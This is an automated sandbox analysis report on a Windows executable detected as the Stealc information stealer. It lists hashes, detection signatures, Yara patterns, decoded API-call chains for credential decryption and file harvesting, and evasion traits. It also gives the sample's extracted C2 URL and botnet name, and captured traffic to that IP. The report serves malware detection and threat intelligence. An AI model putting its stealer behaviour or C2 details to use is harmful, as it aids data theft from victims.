Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
kNp6KbvVoz.exe

Overview

General Information

Sample name:kNp6KbvVoz.exe
renamed because original name is a hash value
Original sample name:0c6e0d5c6de6558eab55ce5fad0b8acd.exe
Analysis ID:1544233
MD5:0c6e0d5c6de6558eab55ce5fad0b8acd
SHA1:7854ebd877d57d4cb951adc174b5d463e0140688
SHA256:49432b3c2186b051d35f09423075574cc82dbac403e5a69f311d4451a5a0e3b4
Tags:32exetrojan
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • kNp6KbvVoz.exe (PID: 6920 cmdline: "C:\Users\user\Desktop\kNp6KbvVoz.exe" MD5: 0C6E0D5C6DE6558EAB55CE5FAD0B8ACD)
    • WerFault.exe (PID: 6332 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6920 -s 1332 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://194.15.46.65/7e57db3b864b30f1.php", "Botnet": "LogsDiller"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2089783465.0000000002EAF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
    00000000.00000002.2089738538.0000000002E39000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x1678:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.1693042238.00000000049A0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Click to see the 4 entries
          SourceRuleDescriptionAuthorStrings
          0.2.kNp6KbvVoz.exe.400000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
            0.3.kNp6KbvVoz.exe.49a0000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
              0.3.kNp6KbvVoz.exe.49a0000.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                0.2.kNp6KbvVoz.exe.48c0e67.2.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  0.2.kNp6KbvVoz.exe.400000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    Click to see the 1 entries
                    No Sigma rule has matched
                    No Suricata rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: kNp6KbvVoz.exeAvira: detected
                    Source: 00000000.00000003.1693042238.00000000049A0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://194.15.46.65/7e57db3b864b30f1.php", "Botnet": "LogsDiller"}
                    Source: http://194.15.46.65/7e57db3b864b30f1.phpVirustotal: Detection: 16%Perma Link
                    Source: kNp6KbvVoz.exeReversingLabs: Detection: 73%
                    Source: kNp6KbvVoz.exeVirustotal: Detection: 61%Perma Link
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: kNp6KbvVoz.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_00419030 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00419030
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0040C920 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,0_2_0040C920
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0040A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_0040A210
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_004072A0 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_004072A0
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0040A2B0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_0040A2B0
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048CA477 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_048CA477
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048C7507 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_048C7507
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048CA517 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_048CA517
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048D9297 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_048D9297
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048CCB87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,0_2_048CCB87

                    Compliance

                    barindex
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeUnpacked PE file: 0.2.kNp6KbvVoz.exe.400000.0.unpack
                    Source: kNp6KbvVoz.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: Binary string: my_library.pdbU source: kNp6KbvVoz.exe, 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, kNp6KbvVoz.exe, 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, kNp6KbvVoz.exe, 00000000.00000003.1693042238.00000000049A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: my_library.pdb source: kNp6KbvVoz.exe, kNp6KbvVoz.exe, 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, kNp6KbvVoz.exe, 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, kNp6KbvVoz.exe, 00000000.00000003.1693042238.00000000049A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_004140F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_004140F0
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0040E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E530
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0040BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcatA,lstrcatA,lstrcatA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE40
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0040EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040EE20
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_00414B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414B60
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_00413B00 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00413B00
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0040DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DF10
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_00401710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00401710
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_004147C0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_004147C0
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0040DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DB80
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0040F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F7B0
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048CE797 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_048CE797
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048CF087 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_048CF087
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048CC0A7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,memset,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_048CC0A7
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048CE177 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_048CE177
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048D4357 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_048D4357
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048D4DC7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_048D4DC7
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048CDDE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_048CDDE7
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048D3D67 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_048D3D67
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048C1977 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_048C1977
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048CFA17 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_048CFA17
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048D4A27 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_048D4A27

                    Networking

                    barindex
                    Source: Malware configuration extractorURLs: http://194.15.46.65/7e57db3b864b30f1.php
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 194.15.46.65Connection: Keep-AliveCache-Control: no-cache
                    Source: Joe Sandbox ViewIP Address: 194.15.46.65 194.15.46.65
                    Source: Joe Sandbox ViewASN Name: VENUS-INTERNET-ASGB VENUS-INTERNET-ASGB
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.15.46.65
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.15.46.65
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.15.46.65
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.15.46.65
                    Source: unknownTCP traffic detected without corresponding DNS query: 194.15.46.65
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,KiUserExceptionDispatcher,InternetCloseHandle,InternetCloseHandle,0_2_00405000
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 194.15.46.65Connection: Keep-AliveCache-Control: no-cache
                    Source: kNp6KbvVoz.exe, 00000000.00000002.2089693088.0000000002E2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.15.46.65
                    Source: kNp6KbvVoz.exe, 00000000.00000002.2089783465.0000000002EF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.15.46.65/
                    Source: kNp6KbvVoz.exe, 00000000.00000002.2089783465.0000000002EF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.15.46.65/#
                    Source: kNp6KbvVoz.exe, 00000000.00000002.2089783465.0000000002EF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.15.46.65/#Q-
                    Source: kNp6KbvVoz.exe, 00000000.00000002.2089783465.0000000002EAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.15.46.65/D
                    Source: kNp6KbvVoz.exe, 00000000.00000002.2089783465.0000000002EF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.15.46.65/_Q
                    Source: kNp6KbvVoz.exe, 00000000.00000002.2089693088.0000000002E2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.15.46.65/stemDrive=C:SystemRoot=L
                    Source: kNp6KbvVoz.exe, 00000000.00000002.2089693088.0000000002E2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.15.46.65b
                    Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                    Source: kNp6KbvVoz.exe, kNp6KbvVoz.exe, 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, kNp6KbvVoz.exe, 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, kNp6KbvVoz.exe, 00000000.00000003.1693042238.00000000049A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_00409E30 memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcpy,memset,CreateProcessA,Sleep,CloseDesktop,0_2_00409E30

                    System Summary

                    barindex
                    Source: 00000000.00000002.2089738538.0000000002E39000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048FF4FF0_2_048FF4FF
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048F159F0_2_048F159F
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0491A5FF0_2_0491A5FF
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_049036EF0_2_049036EF
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0494A76F0_2_0494A76F
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0493A08F0_2_0493A08F
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0492A19F0_2_0492A19F
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048F11DF0_2_048F11DF
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0491B1CF0_2_0491B1CF
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_049082DF0_2_049082DF
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0493134F0_2_0493134F
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_04935C000_2_04935C00
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0491AD0F0_2_0491AD0F
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0492ED3D0_2_0492ED3D
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0492FFEF0_2_0492FFEF
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0493C8050_2_0493C805
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_048ED9AB0_2_048ED9AB
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_04939AAF0_2_04939AAF
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_0492CA0F0_2_0492CA0F
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_04903A0F0_2_04903A0F
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_04905B2F0_2_04905B2F
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_04948B640_2_04948B64
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: String function: 00404610 appears 317 times
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6920 -s 1332
                    Source: kNp6KbvVoz.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000000.00000002.2089738538.0000000002E39000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: kNp6KbvVoz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@0/1
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_00418810 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00418810
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_00413970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00413970
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6920
                    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\df2b92f1-6bed-49e9-b919-bd1c53e138c2Jump to behavior
                    Source: kNp6KbvVoz.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: kNp6KbvVoz.exeReversingLabs: Detection: 73%
                    Source: kNp6KbvVoz.exeVirustotal: Detection: 61%
                    Source: unknownProcess created: C:\Users\user\Desktop\kNp6KbvVoz.exe "C:\Users\user\Desktop\kNp6KbvVoz.exe"
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6920 -s 1332
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: Binary string: my_library.pdbU source: kNp6KbvVoz.exe, 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, kNp6KbvVoz.exe, 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, kNp6KbvVoz.exe, 00000000.00000003.1693042238.00000000049A0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: my_library.pdb source: kNp6KbvVoz.exe, kNp6KbvVoz.exe, 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, kNp6KbvVoz.exe, 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, kNp6KbvVoz.exe, 00000000.00000003.1693042238.00000000049A0000.00000004.00001000.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeUnpacked PE file: 0.2.kNp6KbvVoz.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.pewume:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeUnpacked PE file: 0.2.kNp6KbvVoz.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\kNp6KbvVoz.exeCode function: 0_2_00419F20 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetP